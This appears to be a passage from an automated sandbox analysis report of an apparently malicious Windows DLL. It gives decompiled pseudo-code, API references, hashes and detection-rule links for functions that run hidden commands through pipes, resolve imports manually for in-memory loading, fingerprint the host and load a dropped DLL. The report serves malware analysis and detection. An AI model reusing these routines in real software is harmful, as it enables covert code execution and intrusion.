					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x2da0590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091E3(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091E3(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9ca);
								E10009F48(0xe);
								E10009F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3ED(_t188, _t180, _t208);
								}
								_t87 = E1000980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x2da0590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x2da0590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E23E(_t183);
										}
										E100052C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x2da0590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x2da07b8
									_t153 = _t51;
									L25:
									_t90 = E1000553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x2da0590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x2e1faa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x2e1faa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E1000861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E1000861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x10004a0b
0x10004a18
0x10004a23
0x10004a28
0x10004a2a
0x10004a2d
0x10004a32
0x10004a35
0x10004a3f
0x10004a41
0x10004a4e
0x10004a57
0x10004a57
0x10004a64
0x10004a7f
0x10004a86
0x10004a88
0x10004a8d
0x10004a92
0x10004a98
0x10004aa7
0x10004ac6
0x10004ac8
0x10004ace
0x10004ad4
0x10004ad9
0x10004add
0x10004ae0
0x10004aea
0x10004aec
0x10004aed
0x10004af8
0x10004afa
0x10004afd
0x10004b02
0x10004b09
0x10004b5e
0x10004b5e
0x10004b63
0x10004bca
0x10004bcf
0x10004bd1
0x10004bdb
0x10004be0
0x10004be0
0x10004bfa
0x10004bfc
0x10004bff
0x10004c01
0x00000000
0x00000000
0x10004c07
0x10004c11
0x10004c1a
0x10004c1f
0x10004c22
0x10004c28
0x10004c2e
0x10004c36
0x10004c38
0x10004c3b
0x10004c3c
0x10004c41
0x10004c44
0x10004c47
0x10004c49
0x10004c4d
0x10004c4d
0x10004c52
0x10004c55
0x10004c57
0x10004c5b
0x10004c5b
0x10004c62
0x10004c67
0x10004c69
0x10004c6d
0x10004c6f
0x10004c75
0x10004c79
0x10004c7c
0x10004c7d
0x10004c82
0x10004c85
0x10004c8a
0x10004cb2
0x10004cb8
0x10004cbf
0x10004cce
0x10004cd3
0x00000000
0x10004cd3
0x10004cc1
0x00000000
0x10004c8c
0x10004c8c
0x10004c91
0x10004c98
0x10004cdd
0x10004cdd
0x10004ce4
0x10004ce8
0x10004ce9
0x10004ce9
0x10004cf3
0x10004cf8
0x10004cfb
0x10004cfc
0x10004cfe
0x10004d00
0x10004d05
0x10004d0c
0x10004d4f
0x10004d0e
0x10004d13
0x10004d1b
0x10004d1f
0x10004d2a
0x10004d35
0x10004d3d
0x10004d41
0x10004d49
0x10004d49
0x10004d0c
0x10004d55
0x10004d58
0x10004d5a
0x10004d60
0x10004d60
0x10004d62
0x10004d62
0x00000000
0x10004d62
0x10004c9a
0x10004c9a
0x10004ca0
0x10004ca2
0x10004ca7
0x10004ca7
0x10004ca9
0x10004cd8
0x00000000
0x10004cd8
0x10004cab
0x10004ae4
0x10004ae4
0x00000000
0x10004ae4
0x10004c8a
0x10004b69
0x10004b77
0x10004b8a
0x10004b8f
0x10004b95
0x10004b97
0x10004baf
0x10004bb4
0x10004bbd
0x10004bc3
0x00000000
0x10004bc3
0x10004b9f
0x10004ba8
0x00000000
0x10004ba8
0x10004b0b
0x10004b11
0x10004b13
0x10004b51
0x10004b53
0x00000000
0x00000000
0x10004b55
0x10004b59
0x00000000
0x10004b59
0x10004b15
0x10004b1f
0x10004b2b
0x10004b36
0x10004b3d
0x10004b47
0x10004b4c
0x00000000
0x10004b4c
0x10004ae2
0x00000000
0x10004a66
0x10004a71
0x10004a77
0x10004a79
0x10004d64
0x10004d64
0x10004d66
0x10004d6c
0x10004d6c
0x00000000
0x10004a79

APIs

memset.MSVCRT ref: 10004A2D
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D1F
lstrcatW.KERNEL32 ref: 10004D3D
lstrcatW.KERNEL32 ref: 10004D41
lstrcatW.KERNEL32 ref: 10004D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D4F

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56

Uniqueness

Uniqueness Score: -1.00%

Function 1000D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000D75C
SysAllocString.OLEAUT32(?), ref: 1000D764
SysAllocString.OLEAUT32(00000000), ref: 1000D778
SysFreeString.OLEAUT32(?), ref: 1000D7F3
SysFreeString.OLEAUT32(?), ref: 1000D7F6
SysFreeString.OLEAUT32(?), ref: 1000D7FB

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100107F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 10010865
\u%04X, xrefs: 10010911
\u%04X\u%04X, xrefs: 10010950

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 100121FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E100121FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L10012291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L10012291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x100121ff
0x10012207
0x1001220c
0x1001220f
0x10012214
0x1001221a
0x10012223
0x10012227
0x10012227
0x10012223
0x10012229
0x1001222e
0x10012237
0x1001223c
0x1001223f
0x10012248
0x1001224a
0x10012251
0x10012262
0x10012262
0x10012264
0x1001226c
0x10012273
0x00000000
0x1001226e
0x10012272
0x10012272
0x10012253
0x10012253
0x10012259
0x1001225b
0x10012260
0x10012276
0x10012279
0x1001227e
0x00000000
0x00000000
0x00000000
0x10012260

APIs

localeconv.MSVCRT ref: 10012207
strchr.MSVCRT ref: 1001221A
_errno.MSVCRT ref: 10012229
strtod.MSVCRT ref: 10012237
_errno.MSVCRT ref: 10012264

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x2da0590
				GetCurrentProcess();
				_t11 = E1000BA05();
				_t1 = _t29 + 0x1644; // 0x2da1bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x2da07b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3B6(_t3);
				_t7 = _t29 + 0x220; // 0x2da07b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3F1(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x1000cf87
0x1000cf89
0x1000cf90
0x1000cf98
0x1000cfa2
0x1000cfa2
0x1000cfa8
0x1000cfb1
0x1000cfb7
0x1000cfb9
0x1000cfbd
0x1000cfbd
0x1000cfc2
0x1000cfc8
0x1000cfd8
0x1000cfe2
0x1000cfea
0x1000cfed
0x1000cff9
0x1000cfff
0x1000d004
0x1000d00a
0x1000d010
0x1000d016
0x1000d01e

APIs

GetCurrentProcess.KERNEL32(?,?,02DA0590,?,10003545), ref: 1000CF90
GetModuleFileNameW.KERNEL32(00000000,02DA1BD4,00000105,?,?,02DA0590,?,10003545), ref: 1000CFB1
memset.MSVCRT ref: 1000CFE2
GetVersionExA.KERNEL32(02DA0590,02DA0590,?,10003545), ref: 1000CFED
GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E1000861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x2e1faa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x2e1faa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E10008604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x2e1faa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x2e1faa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x2e1faa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x2e1faa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E100091A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009292(_t127);
						E1000861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C379(_t127));
				_t98 =  *0x1001e68c; // 0x2e1fc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x2e1faa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x2e1faa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E1000861A( &_v32, 0);
				return _t128;
			}

0x1000a9c2
0x1000a9c4
0x1000a9d0
0x1000a9d5
0x1000a9d8
0x1000a9da
0x1000a9dd
0x1000a9e0
0x1000a9e7
0x1000a9ea
0x1000a9f1
0x1000a9f4
0x1000a9fe
0x1000a9ff
0x1000aa02
0x1000aa04
0x1000aa05
0x1000aa1c
0x1000ab9c
0x00000000
0x1000ab9c
0x1000aa33
0x1000ab68
0x1000ab6e
0x1000ab79
0x1000ab7b
0x1000ab83
0x1000ab83
0x1000ab8a
0x1000ab8c
0x1000ab95
0x1000ab95
0x00000000
0x1000ab98
0x1000aa39
0x1000aa3c
0x1000aa3f
0x1000aa45
0x1000aa4f
0x1000aa59
0x1000aa60
0x1000aa69
0x1000aa6b
0x1000aa71
0x00000000
0x00000000
0x1000aa7c
0x1000aa83
0x1000aa84
0x1000aa89
0x1000aa8a
0x1000aa8b
0x1000aa90
0x1000aa92
0x1000aa93
0x1000aa94
0x1000aa97
0x1000aa9d
0x00000000
0x00000000
0x1000aaa3
0x1000aaab
0x1000aaae
0x1000aab6
0x1000aab9
0x1000aabc
0x1000aac2
0x1000aad6
0x1000aadc
0x1000aae2
0x1000ab0b
0x1000aae4
0x1000aae4
0x1000aae6
0x1000aae8
0x1000aaf0
0x1000aaf8
0x1000aafd
0x1000aafd
0x1000ab11
0x1000ab13
0x1000ab13
0x1000ab1b
0x1000ab23
0x1000ab24
0x1000ab29
0x1000ab32
0x1000ab52
0x1000ab52
0x1000ab5a
0x1000ab5d
0x1000ab65
0x00000000
0x1000ab65
0x1000ab3b
0x1000ab3f
0x00000000
0x00000000
0x1000ab47
0x00000000

APIs

memset.MSVCRT ref: 1000A9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

D, xrefs: 1000AA4F

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeapPipe$AllocFreememset
String ID: D
API String ID: 488076629-2746444292
Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61

Uniqueness

Uniqueness Score: -1.00%

Function 1001249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1001249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x100124a1
0x100124a9
0x100124be
0x100124d0
0x100124dc
0x100124e2
0x100124e7
0x100124f3
0x1001265e
0x00000000
0x1001265e
0x100124f9
0x10012502
0x10012510
0x10012513
0x10012522
0x10012522
0x10012529
0x10012537
0x1001253a
0x10012557
0x1001255e
0x1001256e
0x10012586
0x10012570
0x10012578
0x10012578
0x10012589
0x1001258d
0x10012599
0x1001259d
0x100125a1
0x100125a5
0x100125b1
0x100125dc
0x100125e4
0x100125f6
0x10012602
0x100125b3
0x100125b8
0x100125c3
0x100125cf
0x100125cf
0x1001260b
0x10012611
0x1001261b
0x10012637
0x1001261d
0x1001262c
0x1001262c
0x1001261b
0x1001263f
0x10012648
0x10012648
0x10012656
0x00000000
0x10012656
0x10012562
0x00000000
0x10012562
0x00000000
0x1001253a
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
LoadLibraryA.KERNEL32(00000000), ref: 10012551

Strings

GetProcAddress, xrefs: 100124C1
kernel32.dll, xrefs: 100124B3

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x2da0590
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095E1(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x2da0590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x2da0590
					asm("sbb eax, eax");
					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x2da0590
					_t68 = E100092E5(_t26 + 0x1020);
					_v12 = _t68;
					E100085D5( &_v8);
					_t32 =  *0x1001e688; // 0x2da0590
					_t34 = E100092E5(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x2e1faa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E171(0x1001bb48, _t60);
					}
